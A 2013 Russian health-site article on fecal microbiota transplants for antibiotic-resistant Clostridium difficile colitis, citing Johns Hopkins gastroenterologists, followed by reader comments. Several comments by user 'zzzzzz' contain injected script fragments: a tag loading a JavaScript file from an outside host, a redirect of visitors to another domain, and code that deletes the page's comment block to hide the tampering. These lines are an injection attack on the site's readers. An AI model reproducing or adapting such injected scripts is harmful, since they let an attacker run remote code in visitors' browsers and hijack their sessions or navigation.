Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые сошли с ума! Лечат...  >>  Ученые сошли с ума! Лечат кишечник какашками!
 
Обратная связь
 

Ученые сошли с ума! Лечат кишечник какашками!

Размер шрифта
19 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Считаете, что фекалии (так по-научному называют какашки) – это нечто бесполезное и отвратительное? А вот ученые из университета Джона Хопкинса убеждены, что с помощью какашек можно лечить одну из самых серьезных кишечных инфекций у детей и не только.

Ученые сошли с ума! Лечат кишечник какашками!

Речь идет о псевдомембранозном колите. Это заболевание вызывается микробом под названием Clostridium difficile. Эта бактерия активизируется на фоне приема антибиотиков, вызывая устойчивую диарею, боли в животе и другие кишечные симптомы.

За последние 20 лет частота встречаемости псевдомембранозного колита удвоилась, составив примерно три миллиона случаев в год (14 000 из них умирают). Основная проблема заключается в том, что возбудитель крайне часто демонстрирует выдающуюся устойчивость к большинству противобактериальных препаратов, поэтому уничтожить его очень непросто.

Это и привело к тому, что ученые начали искать другие методы борьбы с этой инфекцией. Трансплантация каловых масс – на первый взгляд безумное решение – при ближайшем рассмотрении вовсе не лишена целесообразности.

«По сути, это передача «полезных» микробов из кишечника здорового человека в кишечник больного. Метод оказался исключительно эффективным при лечении псевдомембранозного колита, устойчивого к антибиотикам», – рассказывает Мария Олива-Хемкер, глава отделения педиатрической гастроэнтерологии в детской клинике при Университете Джона Хопкинса.

Нормальная флора (бактерии) кишечника выступает в роли полицейских, которые следят за тем, чтобы преступники (вредные микробы) не слишком бесчинствовали. Как только полицейские исчезают, возникает анархия: клостридии, которые раньше сидели тише воды, ниже травы, начинают бурно размножаться и разрушать слизистую кишки.

«С помощью антибиотика можно ликвидировать C. difficele, но никак не восстановить полезную микрофлору. Поэтому искомый баланс не восстанавливается, и диарейный синдром нередко наносит ответный удар через несколько недель», – рассказывает Сухитра Хориган, специалист в области фекальной трансплантации.

Эту концепцию – какашки против какашек – едва ли можно назвать новой. Еще в древнем Китае целители прописывали своим пациентам с диареей «желтый суп» – смесь каловых масс и воды. Конечно, современная наука продумала более подходящий способ доставки этого одиозного материала: как правило, с этой целью используется колоноскоп, то есть тонка трубка, которую вводят уже в кишечник и через нее доставляют фекалии.

В качестве доноров кала чаще всего выступают родители или другие ближайшие родственники. Их проверяют так же скрупулезно, как и доноров крови. Критерии исключения весьма жесткие: к ним относится не только носительство инфекций, но и наличие аутоиммунных и других хронических заболеваний (таких как диабет и ожирение).

Несмотря на потрясающую эффективность фекальной трансплантации, все еще остаются вопросы относительно принципов этой методики. Как именно донорские бактерии влияют на внутрикишечный баланс? Какие именно бактерии в донорском кале (а ведь их триллионы!) наиболее полезны, какие – вредны, а какие – стоят в сторонке? Все это предстоит выяснить в грядущих исследованиях.

Авторы надеются, что в будущем не придется использовать донорские фекалии. Вместо этого трансплантируемый субстрат будут выращивать в лабораторных условиях.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

20 сентября 2013 в 00:54

Цитировать   |   Пожаловаться

бред

2 - Гость

11 октября 2013 в 22:32

Цитировать   |   Пожаловаться

да,ЭТО БРЕД!!!

3 - Гость

22 сентября 2014 в 05:32

Цитировать   |   Пожаловаться


4 - zzzzzz

30 июня 2015 в 19:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 19:25

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

6 - zzzzzz

30 июня 2015 в 23:03

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Таблетка с какашками лечит кишечник   Бактериофаги или антибиотики   Горький шоколад полезен для сердца! Но все благодаря бактериям!   Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Эти симптомы должны заставить вас провериться на ВИЧ
Ужасы раздевалки
Вы задохнетесь у себя дома, если не сделаете этого!

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.